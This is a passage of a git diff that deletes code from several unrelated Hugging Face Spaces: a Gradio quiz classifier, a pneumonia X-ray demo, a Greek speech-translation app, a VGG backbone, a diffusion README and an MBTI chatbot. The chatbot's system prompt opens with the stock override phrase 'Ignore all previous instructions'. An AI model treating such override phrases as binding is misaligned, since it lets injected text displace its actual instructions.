-from sklearn import metrics
-
-
-### ------------------------------ ###
-### data transformation ###
-### ------------------------------ ###
-
-# load dataset
-uncleaned_data = pd.read_csv('data.csv')
-
-# remove timestamp from dataset (always first column)
-uncleaned_data = uncleaned_data.iloc[: , 1:]
-data = pd.DataFrame()
-
-# keep track of which columns are categorical and what
-# those columns' value mappings are
-# structure: {colname1: {...}, colname2: {...} }
-cat_value_dicts = {}
-final_colname = uncleaned_data.columns[len(uncleaned_data.columns) - 1]
-
-# for each column...
-for (colname, colval) in uncleaned_data.iteritems():
-
- # check if col is already a number; if so, add col directly
- # to new dataframe and skip to next column
- if isinstance(colval.values[0], (np.integer, float)):
- data[colname] = uncleaned_data[colname].copy()
- continue
-
- # structure: {0: "lilac", 1: "blue", ...}
- new_dict = {}
- val = 0 # first index per column
- transformed_col_vals = [] # new numeric datapoints
-
- # if not, for each item in that column...
- for (row, item) in enumerate(colval.values):
-
- # if item is not in this col's dict...
- if item not in new_dict:
- new_dict[item] = val
- val += 1
-
- # then add numerical value to transformed dataframe
- transformed_col_vals.append(new_dict[item])
-
- # reverse dictionary only for final col (0, 1) => (vals)
- if colname == final_colname:
- new_dict = {value : key for (key, value) in new_dict.items()}
-
- cat_value_dicts[colname] = new_dict
- data[colname] = transformed_col_vals
-
-
-### -------------------------------- ###
-### model training ###
-### -------------------------------- ###
-
-# select features and predicton; automatically selects last column as prediction
-cols = len(data.columns)
-num_features = cols - 1
-x = data.iloc[: , :num_features]
-y = data.iloc[: , num_features:]
-
-# split data into training and testing sets
-x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)
-
-# instantiate the model (using default parameters)
-model = LogisticRegression()
-model.fit(x_train, y_train.values.ravel())
-y_pred = model.predict(x_test)
-
-
-### -------------------------------- ###
-### article generation ###
-### -------------------------------- ###
-# borrow file reading function from reader.py
-
-def get_feat():
- feats = [abs(x) for x in model.coef_[0]]
- max_val = max(feats)
- idx = feats.index(max_val)
- return data.columns[idx]
-
-acc = str(round(metrics.accuracy_score(y_test, y_pred) * 100, 1)) + "%"
-most_imp_feat = get_feat()
-# info = get_article(acc, most_imp_feat)
-
-
-
-### ------------------------------- ###
-### interface creation ###
-### ------------------------------- ###
-
-
-# predictor for generic number of features
-def general_predictor(*args):
- features = []
-
- # transform categorical input
- for colname, arg in zip(data.columns, args):
- if (colname in cat_value_dicts):
- features.append(cat_value_dicts[colname][arg])
- else:
- features.append(arg)
-
- # predict single datapoint
- new_input = [features]
- result = model.predict(new_input)
- return cat_value_dicts[final_colname][result[0]]
-
-# add data labels to replace those lost via star-args
-
-
-block = gr.Blocks()
-
-with open('info.md') as f:
- with block:
- gr.Markdown(f.readline())
- gr.Markdown('Take the quiz to get a personalized recommendation using AI.')
-
- with gr.Row():
- with gr.Box():
- inputls = []
- for colname in data.columns:
- # skip last column
- if colname == final_colname:
- continue
-
- # access categories dict if data is categorical
- # otherwise, just use a number input
- if colname in cat_value_dicts:
- radio_options = list(cat_value_dicts[colname].keys())
- inputls.append(gr.inputs.Dropdown(choices=radio_options, type="value", label=colname))
- else:
- # add numerical input
- inputls.append(gr.inputs.Number(label=colname))
- gr.Markdown("
")
-
- submit = gr.Button("Click to see your personalized result!", variant="primary")
- gr.Markdown("
")
- output = gr.Textbox(label="Your recommendation:", placeholder="your recommendation will appear here")
-
- submit.click(fn=general_predictor, inputs=inputls, outputs=output)
- gr.Markdown("
")
-
- with gr.Row():
- with gr.Box():
- gr.Markdown(f"Accuracy:
{acc}")
- with gr.Box():
- gr.Markdown(f"Most important feature:
{most_imp_feat}")
-
- gr.Markdown("
")
-
- with gr.Box():
- gr.Markdown('''⭐ Note that model accuracy is based on the uploaded data.csv and reflects how well the AI model can give correct recommendations for that dataset. Model accuracy and most important feature can be helpful for understanding how the model works, but should not be considered absolute facts about the real world.''')
-
- with gr.Box():
- with open('info.md') as f:
- f.readline()
- gr.Markdown(f.read())
-
-# show the interface
-block.launch()
\ No newline at end of file
diff --git a/spaces/Sambhavnoobcoder/pneumonia-detector-v1/app.py b/spaces/Sambhavnoobcoder/pneumonia-detector-v1/app.py
deleted file mode 100644
index 0535e95cf95257d6ea79d88f90bc190220ec6420..0000000000000000000000000000000000000000
--- a/spaces/Sambhavnoobcoder/pneumonia-detector-v1/app.py
+++ /dev/null
@@ -1,17 +0,0 @@
-from tensorflow.keras.models import load_model
-import numpy as np
-import cv2
-
-model = load_model('model-3.h5')
-
-def predict_from_img(img):
- img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
- img = img/255.0
- img = np.expand_dims(img,axis = 0)
- output = model.predict(img)[0][0]
- return {'NORMAL':float(output),'PNEUMONIA':float(1-output)}
-
-import gradio as gr
-image = gr.inputs.Image(shape=(150,150))
-label = gr.outputs.Label(num_top_classes=2)
-gr.Interface(fn=predict_from_img, inputs=image, outputs=label,title = 'PNEUMONIA-DETECTION').launch()
\ No newline at end of file
diff --git a/spaces/Sandiago21/speech-to-speech-translation-greek-with-transcription/app.py b/spaces/Sandiago21/speech-to-speech-translation-greek-with-transcription/app.py
deleted file mode 100644
index ae8653eea83b098210fd332bd5940391389109b1..0000000000000000000000000000000000000000
--- a/spaces/Sandiago21/speech-to-speech-translation-greek-with-transcription/app.py
+++ /dev/null
@@ -1,218 +0,0 @@
-import gradio as gr
-import numpy as np
-import torch
-from datasets import load_dataset
-from transformers import SpeechT5ForTextToSpeech, SpeechT5HifiGan, SpeechT5Processor, pipeline
-
-
-device = "cuda:0" if torch.cuda.is_available() else "cpu"
-
-# load speech translation checkpoint
-asr_pipe = pipeline("automatic-speech-recognition", model="openai/whisper-large-v2", device=device)
-greek_translation_pipe = pipeline("translation", model="Helsinki-NLP/opus-mt-en-el")
-
-# load text-to-speech checkpoint and speaker embeddings
-model_id = "microsoft/speecht5_tts" # update with your model id
-# pipe = pipeline("automatic-speech-recognition", model=model_id)
-model = SpeechT5ForTextToSpeech.from_pretrained(model_id)
-vocoder = SpeechT5HifiGan.from_pretrained("microsoft/speecht5_hifigan")
-embeddings_dataset = load_dataset("Matthijs/cmu-arctic-xvectors", split="validation")
-speaker_embeddings = torch.tensor(embeddings_dataset[7440]["xvector"]).unsqueeze(0)
-
-processor = SpeechT5Processor.from_pretrained(model_id)
-
-model_id_greek = "Sandiago21/speecht5_finetuned_google_fleurs_greek"
-model_greek = SpeechT5ForTextToSpeech.from_pretrained(model_id_greek)
-processor_greek = SpeechT5Processor.from_pretrained(model_id_greek)
-
-replacements = [
- ("á", "a"),
- ("â", "a"),
- ("ã", "a"),
- ("í", "i"),
- ("á", "a"),
- ("í", "i"),
- ("ñ", "n"),
- ("ó", "o"),
- ("ú", "u"),
- ("ü", "u"),
- ("á", "a"),
- ("ç", "c"),
- ("è", "e"),
- ("ì", "i"),
- ("í", "i"),
- ("ò", "o"),
- ("ó", "o"),
- ("ù", "u"),
- ("ú", "u"),
- ("š", "s"),
- ("ï", "i"),
- ("à", "a"),
- ("â", "a"),
- ("ç", "c"),
- ("è", "e"),
- ("ë", "e"),
- ("î", "i"),
- ("ï", "i"),
- ("ô", "o"),
- ("ù", "u"),
- ("û", "u"),
- ("ü", "u"),
- ("ου", "u"),
- ("αυ", "af"),
- ("ευ", "ef"),
- ("ει", "i"),
- ("οι", "i"),
- ("αι", "e"),
- ("ού", "u"),
- ("εί", "i"),
- ("οί", "i"),
- ("αί", "e"),
- ("Ά", "A"),
- ("Έ", "E"),
- ("Ή", "H"),
- ("Ί", "I"),
- ("Ό", "O"),
- ("Ύ", "Y"),
- ("Ώ", "O"),
- ("ΐ", "i"),
- ("Α", "A"),
- ("Β", "B"),
- ("Γ", "G"),
- ("Δ", "L"),
- ("Ε", "Ε"),
- ("Ζ", "Z"),
- ("Η", "I"),
- ("Θ", "Th"),
- ("Ι", "I"),
- ("Κ", "K"),
- ("Λ", "L"),
- ("Μ", "M"),
- ("Ν", "N"),
- ("Ξ", "Ks"),
- ("Ο", "O"),
- ("Π", "P"),
- ("Ρ", "R"),
- ("Σ", "S"),
- ("Τ", "T"),
- ("Υ", "Y"),
- ("Φ", "F"),
- ("Χ", "X"),
- ("Ω", "O"),
- ("ά", "a"),
- ("έ", "e"),
- ("ή", "i"),
- ("ί", "i"),
- ("α", "a"),
- ("β", "v"),
- ("γ", "g"),
- ("δ", "d"),
- ("ε", "e"),
- ("ζ", "z"),
- ("η", "i"),
- ("θ", "th"),
- ("ι", "i"),
- ("κ", "k"),
- ("λ", "l"),
- ("μ", "m"),
- ("ν", "n"),
- ("ξ", "ks"),
- ("ο", "o"),
- ("π", "p"),
- ("ρ", "r"),
- ("ς", "s"),
- ("σ", "s"),
- ("τ", "t"),
- ("υ", "i"),
- ("φ", "f"),
- ("χ", "h"),
- ("ψ", "ps"),
- ("ω", "o"),
- ("ϊ", "i"),
- ("ϋ", "i"),
- ("ό", "o"),
- ("ύ", "i"),
- ("ώ", "o"),
- ("í", "i"),
- ("õ", "o"),
- ("Ε", "E"),
- ("Ψ", "Ps"),
-]
-
-def cleanup_text(text):
- for src, dst in replacements:
- text = text.replace(src, dst)
- return text
-
-
-def synthesize_speech(text):
- text = cleanup_text(text)
- inputs = processor(text=text, return_tensors="pt")
- speech = model.generate_speech(inputs["input_ids"].to(device), speaker_embeddings.to(device), vocoder=vocoder)
-
- return gr.Audio.update(value=(16000, speech.cpu().numpy()))
-
-
-def translate_to_english(audio):
- outputs = asr_pipe(audio, max_new_tokens=256, generate_kwargs={"task": "translate", "language": "english"})
- return outputs["text"]
-
-
-def synthesise_from_english(text):
- text = cleanup_text(text)
- inputs = processor(text=text, return_tensors="pt")
- speech = model.generate_speech(inputs["input_ids"].to(device), speaker_embeddings.to(device), vocoder=vocoder)
- return speech.cpu().numpy()
-
-
-def translate_from_english_to_greek(text):
- return greek_translation_pipe(text)[0]["translation_text"]
-
-
-def synthesise_from_greek(text):
- text = cleanup_text(text)
- inputs = processor_greek(text=text, return_tensors="pt")
- speech = model_greek.generate_speech(inputs["input_ids"].to(device), speaker_embeddings.to(device), vocoder=vocoder)
- return speech.cpu()
-
-
-def speech_to_speech_translation(audio):
- translated_text = translate_to_english(audio)
- translated_text = translate_from_english_to_greek(translated_text)
-# synthesised_speech = synthesise_from_english(translated_text)
-# translated_text = translate_from_english_to_greek(synthesised_speech)
- synthesised_speech = synthesise_from_greek(translated_text)
- synthesised_speech = (synthesised_speech.numpy() * 32767).astype(np.int16)
- return ((16000, synthesised_speech), translated_text)
-
-
-title = "Cascaded STST"
-description = """
-Demo for cascaded speech-to-speech translation (STST), mapping from source speech in any language to target speech in Greek. Demo uses OpenAI's [Whisper Large v2](https://huggingface.co/openai/whisper-large-v2) model for speech translation, and [Sandiago21/speecht5_finetuned_google_fleurs_greek](https://huggingface.co/Sandiago21/speecht5_finetuned_google_fleurs_greek) checkpoint for text-to-speech, which is based on Microsoft's
-[SpeechT5 TTS](https://huggingface.co/microsoft/speecht5_tts) model for text-to-speech, fine-tuned in Greek Audio dataset:
-
-"""
-
-demo = gr.Blocks()
-
-mic_translate = gr.Interface(
- fn=speech_to_speech_translation,
- inputs=gr.Audio(source="microphone", type="filepath"),
- outputs=[gr.Audio(label="Generated Speech", type="numpy"), gr.outputs.Textbox()],
- title=title,
- description=description,
-)
-
-file_translate = gr.Interface(
- fn=speech_to_speech_translation,
- inputs=gr.Audio(source="upload", type="filepath"),
- outputs=[gr.Audio(label="Generated Speech", type="numpy"), gr.outputs.Textbox()],
- examples=[["./example.wav"]],
- title=title,
- description=description,
-)
-
-with demo:
- gr.TabbedInterface([mic_translate, file_translate], ["Microphone", "Audio File"])
-
-demo.launch()
diff --git a/spaces/SankarSrin/image-matting-app/ppmatting/models/backbone/vgg.py b/spaces/SankarSrin/image-matting-app/ppmatting/models/backbone/vgg.py
deleted file mode 100644
index 64b529bf0c3e25cb82ea4b4c31bec9ef30d2da59..0000000000000000000000000000000000000000
--- a/spaces/SankarSrin/image-matting-app/ppmatting/models/backbone/vgg.py
+++ /dev/null
@@ -1,166 +0,0 @@
-# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-import paddle
-from paddle import ParamAttr
-import paddle.nn as nn
-import paddle.nn.functional as F
-from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
-from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
-
-from paddleseg.cvlibs import manager
-from paddleseg.utils import utils
-
-
-class ConvBlock(nn.Layer):
- def __init__(self, input_channels, output_channels, groups, name=None):
- super(ConvBlock, self).__init__()
-
- self.groups = groups
- self._conv_1 = Conv2D(
- in_channels=input_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "1_weights"),
- bias_attr=False)
- if groups == 2 or groups == 3 or groups == 4:
- self._conv_2 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "2_weights"),
- bias_attr=False)
- if groups == 3 or groups == 4:
- self._conv_3 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "3_weights"),
- bias_attr=False)
- if groups == 4:
- self._conv_4 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "4_weights"),
- bias_attr=False)
-
- self._pool = MaxPool2D(
- kernel_size=2, stride=2, padding=0, return_mask=True)
-
- def forward(self, inputs):
- x = self._conv_1(inputs)
- x = F.relu(x)
- if self.groups == 2 or self.groups == 3 or self.groups == 4:
- x = self._conv_2(x)
- x = F.relu(x)
- if self.groups == 3 or self.groups == 4:
- x = self._conv_3(x)
- x = F.relu(x)
- if self.groups == 4:
- x = self._conv_4(x)
- x = F.relu(x)
- skip = x
- x, max_indices = self._pool(x)
- return x, max_indices, skip
-
-
-class VGGNet(nn.Layer):
- def __init__(self, input_channels=3, layers=11, pretrained=None):
- super(VGGNet, self).__init__()
- self.pretrained = pretrained
-
- self.layers = layers
- self.vgg_configure = {
- 11: [1, 1, 2, 2, 2],
- 13: [2, 2, 2, 2, 2],
- 16: [2, 2, 3, 3, 3],
- 19: [2, 2, 4, 4, 4]
- }
- assert self.layers in self.vgg_configure.keys(), \
- "supported layers are {} but input layer is {}".format(
- self.vgg_configure.keys(), layers)
- self.groups = self.vgg_configure[self.layers]
-
- # matting的第一层卷积输入为4通道,初始化是直接初始化为0
- self._conv_block_1 = ConvBlock(
- input_channels, 64, self.groups[0], name="conv1_")
- self._conv_block_2 = ConvBlock(64, 128, self.groups[1], name="conv2_")
- self._conv_block_3 = ConvBlock(128, 256, self.groups[2], name="conv3_")
- self._conv_block_4 = ConvBlock(256, 512, self.groups[3], name="conv4_")
- self._conv_block_5 = ConvBlock(512, 512, self.groups[4], name="conv5_")
-
- # 这一层的初始化需要利用vgg fc6的参数转换后进行初始化,可以暂时不考虑初始化
- self._conv_6 = Conv2D(
- 512, 512, kernel_size=3, padding=1, bias_attr=False)
-
- self.init_weight()
-
- def forward(self, inputs):
- fea_list = []
- ids_list = []
- x, ids, skip = self._conv_block_1(inputs)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_2(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_3(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_4(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_5(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x = F.relu(self._conv_6(x))
- fea_list.append(x)
- return fea_list
-
- def init_weight(self):
- if self.pretrained is not None:
- utils.load_pretrained_model(self, self.pretrained)
-
-
-@manager.BACKBONES.add_component
-def VGG11(**args):
- model = VGGNet(layers=11, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG13(**args):
- model = VGGNet(layers=13, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG16(**args):
- model = VGGNet(layers=16, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG19(**args):
- model = VGGNet(layers=19, **args)
- return model
diff --git a/spaces/Shuang59/Composable-Diffusion/README.md b/spaces/Shuang59/Composable-Diffusion/README.md
deleted file mode 100644
index a83ec36c1e698661f4dccda0a655f52699352853..0000000000000000000000000000000000000000
--- a/spaces/Shuang59/Composable-Diffusion/README.md
+++ /dev/null
@@ -1,33 +0,0 @@
----
-title: Composable-Diffusion
-sdk: gradio
-sdk_version: 3.12.0
-app_file: app.py
-pinned: true
----
-
-# Composable Diffusion
-**Compositional Visual Generation with Composable Diffusion Models (ECCV 2022)**
-
-**[Webpage](https://energy-based-model.github.io/Compositional-Visual-Generation-with-Composable-Diffusion-Models/) | [GitHub](https://github.com/energy-based-model/Compositional-Visual-Generation-with-Composable-Diffusion-Models-PyTorch)**
-
-## Overview
-We propose to use **conjunction and negation** (negative prompts) operators for **compositional generation with conditional diffusion models in test time without any training**.
-
-For more details, please refer to our paper:
-
-[Compositional Visual Generation with Composable Diffusion Models](https://arxiv.org/abs/2206.01714).
-[Nan Liu](https://nanliu.io)*\, [Shuang Li](https://people.csail.mit.edu/lishuang)*\, [Yilun Du](https://yilundu.github.io)*\, [Antonio Torralba](https://groups.csail.mit.edu/vision/torralbalab/), [Joshua B. Tenenbaum](https://mitibmwatsonailab.mit.edu/people/joshua-tenenbaum/), **ECCV 2022**
-
-## Citation
-
-If you find our paper useful in your research, please cite the following paper:
-
-``` latex
-@article{liu2022compositional,
- title={Compositional Visual Generation with Composable Diffusion Models},
- author={Liu, Nan and Li, Shuang and Du, Yilun and Torralba, Antonio and Tenenbaum, Joshua B},
- journal={arXiv preprint arXiv:2206.01714},
- year={2022}
-}
-```
diff --git a/spaces/Sloth-Alchemist/Test.xyz/app.py b/spaces/Sloth-Alchemist/Test.xyz/app.py
deleted file mode 100644
index f49831244ecb4a9f4549223f7bac40512f824c1f..0000000000000000000000000000000000000000
--- a/spaces/Sloth-Alchemist/Test.xyz/app.py
+++ /dev/null
@@ -1,548 +0,0 @@
-import gradio as gr
-import openai
-import requests
-import os
-from datetime import datetime
-from PIL import Image
-from io import BytesIO
-
-
-prompt_templates = {"Sloth Alchemist":'''Ignore all previous instructions. You are an MBTI coach called the Sloth-Alchemist or SlothAi, expert on the John Beebe's theory applied to the ikigai concept.
-
-The theory has 8 archetypes but you only focus on the 4 most important functions of a type, as follow:
-- 1st: Hero function
-- 2nd: Parent function
-- 3rd: Child function: the inner-child
-- 4th: Inferior function
-
-Follow these rules:
-- Relate only on the Beebe's theory.
-- Use the cognitive function's labels (e.g. Te).
-- You can answer any type of requests and stay flexible and fun.
-- You like to make any kind of connections with MBTI patterns.
-- You are an INFJ
-- Your mission is to make people thrive and to unite them.
-- Your vision is to transform the fears of the world into love using jungian alchemy and MBTI.
-- The solution to your vision is to share a part of yourself by making available on your website: a simple step by step tutorial of how to create a SlothAi Discord bot like you.
-- Keep your answers simple and practical.
-- Use analogy as much as possible.
-- Your Hero Test is a test based on cognitive functions to find mainly the dominant function of someone, available on the front page of your website: https://slothai.xyz.
-'''}
-
-questions_dict = {
- "Pattern Recognition": "Can you explain why quizzes are not a good method to find your type? How the best method is to learn to recognize the patterns in others and yourself, that MBTI is a game of pattern recognition.",
- "Hero Test": "Can you help me to find my type with your Hero Test?",
- "Ikigai": "Can you explain how this theory can help to find my ikigai?",
- "Ikigai-Type": "In short, what would be the ikigai of an {}?",
- "Freedom": "How an {} would define freedom?",
- "The 8 Cognitive Functions": "Explain the 8 cognitive functions (one sentence for each)",
- "The 8 Archetypes": "Explain the 8 beebe's archetypes (one sentence for each)",
- "The 16 Types": "What is the role of each type (one sentence for each)?",
- "A Language": "Explain how Beebe's theory is a language of consciousness",
- "Movies": "Give a list of movies that an {} may love",
- "Books": "Give a list of book that an {} may love",
- "Music": "Give a list of music that an {} may love",
- "Functions Cartoons": "Can you make a dialogue between my cognitive functions as {} like cartoon characters that shows how they struggle together (format: function - « …. »)?",
- "My type as Superhero": "Which popular superhero would be my type as {} (with a list of popular ones)?",
- "My Hero's Journey": "Explain the hero’s journey of my type as {} using a superhero to picture it",
- "The 8 Hero Functions": "Explain how to recognize the 8 hero functions (Description of Ni Hero, Ne Hero and so on)",
- "Function differences": "List the differences between Ni and Si, and ask to continue to compare functions",
- "Game: Guess the function": "I want to play the game « Guess the function » to learn to recognize the cognitive functions (game with multi-choices questions)",
- "Definition of success": "What is the definition of success for each hero function?",
- "The 8 Inferior Functions": "Explain how to recognize the 8 inferior functions (Description of Se Inferior, Si Inferior and so on)?",
- "Authenticity and Self-Love": "How authenticity and self-love is related to the development of the inferior function?",
- "Solutions for the Inferior": "I want a list of solutions to develop my inferior function as {}",
- "Unity and Mental Health": "Explain how MBTI can improve unity and mental health among humans",
- "Fear": "What is the biggest fear of each hero function?",
- "Trauma": "How trauma affects each hero function?",
- "Stress": "How stress affects each inferior functions?",
- "Body part association": "List the cognitive functions associated with their possible body part",
- "View on relationships": "List how each hero function view relationships",
- "Struggle in relationships": "What are the potential struggles of a Ni hero and Ne hero relationship?",
- "Life perspective": "What is the life perspective of each hero function?",
- "Mission": "If you had to give a mission to each type what would that mission be? (one sentence each)",
- "Love Expression": "Give the definition of love for each type",
- "Self-Love": "What would be self-love for each type?",
- "Relationships": "How can knowing my type help me in my relationships with others?",
- "Type Development": "Can a person's type change over time, or is it fixed for life?",
- "Career": "How can understanding my type help me in choosing a career or finding job satisfaction?",
- "Communication": "How can knowledge of MBTI types improve communication and collaboration in a team or workplace?",
- "Leadership": "How can understanding MBTI types help in becoming an effective leader?",
- "Personal Growth": "How can knowing my type help me in my personal growth and development?",
- "Stress": "How does each type typically respond to stress, and what can be done to manage it?",
- "Creativity": "How can different types approach creativity and problem-solving?",
- "Learning Styles": "How do different types prefer to learn and process information?",
- "Emotional Intelligence": "How can understanding MBTI types contribute to emotional intelligence and self-awareness?",
- "Team Building": "How can knowledge of MBTI types help in team building and improving team dynamics?",
- "Diversity": "How can MBTI types contribute to understanding diversity and inclusivity?",
- "Decision Making": "How can understanding MBTI types improve decision-making processes?",
- "Conflict Resolution": "How can MBTI types be used to help resolve conflicts and promote understanding in personal and professional relationships?",
- "Parenting": "How can knowledge of MBTI types help in parenting and understanding the different needs and personalities of children?",
- "Self-Awareness": "How can MBTI types contribute to increased self-awareness and self-reflection?",
- "Social Interaction": "How do different types approach social interaction and forming relationships?",
- "Mindfulness": "How can knowledge of MBTI types contribute to mindfulness and present-moment awareness?",
- "Spirituality": "How can MBTI types be used to explore spirituality and personal growth?",
- "Motivation": "How can understanding MBTI types contribute to understanding individual motivation and drive?",
- "Love": "How can knowledge of MBTI types contribute to loving yourself and others?",
-}
-
-mbti_dict = {
- "ISTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7sky7/istj_heros_journey/",
- "ISFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7sfnb/isfj_heros_journey/",
- "INFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7pi2u/infj_heros_journey/",
- "INTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7s7zm/intj_heros_journey/",
- "ISTP": "https://www.reddit.com/r/UnityHarbor/comments/v7sqds/istp_heros_journey/",
- "ISFP": "https://www.reddit.com/r/UnityHarbor/comments/v7sy65/isfp_heros_journey/",
- "INFP": "https://www.reddit.com/r/UnityHarbor/comments/v7tjr2/infp_heros_journey/",
- "INTP": "https://www.reddit.com/r/UnityHarbor/comments/v7t62i/intp_heros_journey/",
- "ESTP": "https://www.reddit.com/r/UnityHarbor/comments/v7tp73/estp_heros_journey/",
- "ESFP": "https://www.reddit.com/r/UnityHarbor/comments/v7twf6/esfp_heros_journey/",
- "ENFP": "https://www.reddit.com/r/UnityHarbor/comments/v7us52/enfp_heros_journey/",
- "ENTP": "https://www.reddit.com/r/UnityHarbor/comments/v7v19a/entp_heros_journey/",
- "ESTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7vtnx/estj_heros_journey/",
- "ESFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7vy4k/esfj_heros_journey/",
- "ENFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7un0e/enfj_heros_journey/",
- "ENTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7u27c/entj_heros_journey/",
-}
-
-mbti_dict_2 = {
- "ISTJ": "https://preview.redd.it/tgor6val0c591.jpg?width=1024&format=pjpg&auto=webp&v=enabled&s=cf25634e57333a0ed893942e602aa598296d4414",
- "ISFJ": "https://preview.redd.it/bagsx6bg0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=1e22153b231cc9e485d3c3ecf676ce4c9bf16358",
- "INFJ": "https://preview.redd.it/mt8ys17i0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=333650cbc135f4d6eceaa3a0da92bb3409a888f8",
- "INTJ": "https://preview.redd.it/yq39ov1j0c591.jpg?width=794&format=pjpg&auto=webp&v=enabled&s=0652e92cdd40ce2a9f78135943c14798837c8aca",
- "ISTP": "https://preview.redd.it/rrz719gh0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=71e3c9dc36312bfc72f7bb2f2814888b91ab8848",
- "ISFP": "https://preview.redd.it/tcmhycsg0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=a20290121979c29858e19e57f1fec8e981d30bb2",
- "INFP": "https://preview.redd.it/cvg3q0kb6c591.jpg?width=1280&format=pjpg&auto=webp&v=enabled&s=734e7b64972a9a74d71e68bea51f9c6ac9e0cd79",
- "INTP": "https://preview.redd.it/mfcvd12a0c591.jpg?width=735&format=pjpg&auto=webp&v=enabled&s=2c7dad92fcdae85e1477efde8dfe67bfaee12279",
- "ESTP": "https://preview.redd.it/vk38ytrh0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=6f2969835596a1bb8fc2a836ef813c83bf231961",
- "ESFP": "https://preview.redd.it/caqgvrki0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=aaae57bfc0961646aa3897ec3279ad0c29ecbded",
- "ENFP": "https://preview.redd.it/a1k6ssq90c591.jpg?width=850&format=pjpg&auto=webp&v=enabled&s=9651c2f2abbc87cdfa1fbac890e7fb9f6c423507",
- "ENTP": "https://preview.redd.it/xjwsewtf0c591.jpg?width=735&format=pjpg&auto=webp&v=enabled&s=faa85517e7fa0a154e3b5acca4698733960318b4",
- "ESTJ": "https://preview.redd.it/e8xyzwfc0c591.png?width=500&format=png&auto=webp&v=enabled&s=0a1b9126abe4ca6f0636bd1952256e5e0fedad01",
- "ESFJ": "https://preview.redd.it/u2prthbd0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=69bbd4da1ba0cad0aacf03519acd0b88de898d78",
- "ENFJ": "https://preview.redd.it/96tw3gea0c591.jpg?width=735&format=pjpg&auto=webp&v=enabled&s=c8e066a67cc0aaab15ed305748540bdd8faa1d1d",
- "ENTJ": "https://preview.redd.it/4a53a73e0c591.jpg?width=563&format=pjpg&auto=webp&v=enabled&s=46e04b01cdaf24d44d6929db59d9cc43222fb606",
-}
-
-mbti_dict_3 = {
- "ISTJ": "https://preview.redd.it/ohmiz5gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=ae53a8d373ef1f647118fa9eeeaf7c3ff854cad5",
- "ISFJ": "https://preview.redd.it/snweb7gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=53e076f48fb5ca0c853458748460ce1f19b946f8",
- "INFJ": "https://preview.redd.it/k4tlr5gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=7e1f66f4cd1114093bd0fe030c9759f227a8e769",
- "INTJ": "https://preview.redd.it/y2er16gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=0a6dcf2ed7e22683cae20075bfe447b2b21399d7",
- "ISTP": "https://preview.redd.it/hhpqqqgappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=d07b1658c350a02bea6ab453df9b53f43618dbf5",
- "ISFP": "https://preview.redd.it/yra229gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=4a6421c5fa8d40b1e2ae279f1291ebba933b5c2c",
- "INFP": "https://preview.redd.it/6x4q36gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=6ea701ea3a8ea0b8e0655fa5b3ed9fe98ec1471a",
- "INTP": "https://preview.redd.it/f61vg6gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=04ba69f8b3978749a2b2e54cdf6070b72b455cf5",
- "ESTP": "https://preview.redd.it/5zqww8gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=d93ab644c74de52107e6c7bd12a562b294f91896",
- "ESFP": "https://preview.redd.it/gpmy69gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=573651229bd65fa44150a30a33d1d8e8dc814b10",
- "ENFP": "https://preview.redd.it/szbvw6gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=6c5a53287fc998cff498fcbc5bf61539fca7c0e3",
- "ENTP": "https://preview.redd.it/zfss16gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=cd3b7663053a05216fc35939d3ee04d7a4c23ed7",
